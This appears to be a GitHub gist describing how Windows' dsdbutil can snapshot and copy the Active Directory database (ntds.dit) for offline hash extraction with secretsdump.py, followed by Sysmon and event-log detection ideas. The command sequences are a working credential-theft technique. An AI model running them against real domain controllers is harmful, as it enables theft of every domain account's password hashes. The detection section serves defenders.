Last active
February 21, 2023 14:29
-
-
Save bohops/88561ca40998e83deb3d1da90289e358 to your computer and use it in GitHub Desktop.
yet another native AD database extraction utility
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DSDButil | |
======== | |
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)] | |
- dsdbutil supports VSS snapshot creation | |
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py) | |
- Example #1: Using Snapshot GUID obtained from cmd output | |
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit" | |
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit" | |
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak | |
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit" | |
- Example #2: Living dangerously with (assumed) snapshot identifier | |
dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit" | |
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak | |
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit" | |
*dsdbutil also supports an interactive mode, which is likely more stable than the examples above. | |
=========================== | |
*Defensive Considerations | |
I chatted with @SBousseaden about a few Sysmon detection strategies. Here are a few ideas: | |
- CMDline logging is interesting - dsdbutil can run a string of commands (i.e. as demonstrated above) | |
or interactively (to hide actual commands) | |
- Although a bit combersome, "Service Control Manager" source for VSS will be logged as System Event ID 7036 with | |
a description of "The Microsoft Software Shadow Copy Provider service entered the running state." | |
- If a volume is mounted,a "NTFS" source will be logged as System Event ID 98 with a description highlighting | |
the Volume Shadow Copy ID such as "Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy. No action is needed." | |
- With a mount operation, dsdbuil mounts the snapshot at the logical drive root with a prefix | |
of "$SNAP_" (e.g. C:\$SNAP_201906250551_VOLUMEC$\). This has utility for monitoring interesting "Image Names" | |
or paths for Sysmont events (e.g. FileCreate, Execute, etc.). | |
- And of course, Sysmon Events that contain "HarddiskVolumeShadowCopy" within the Image and Cmdline fields are always interesting as well | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment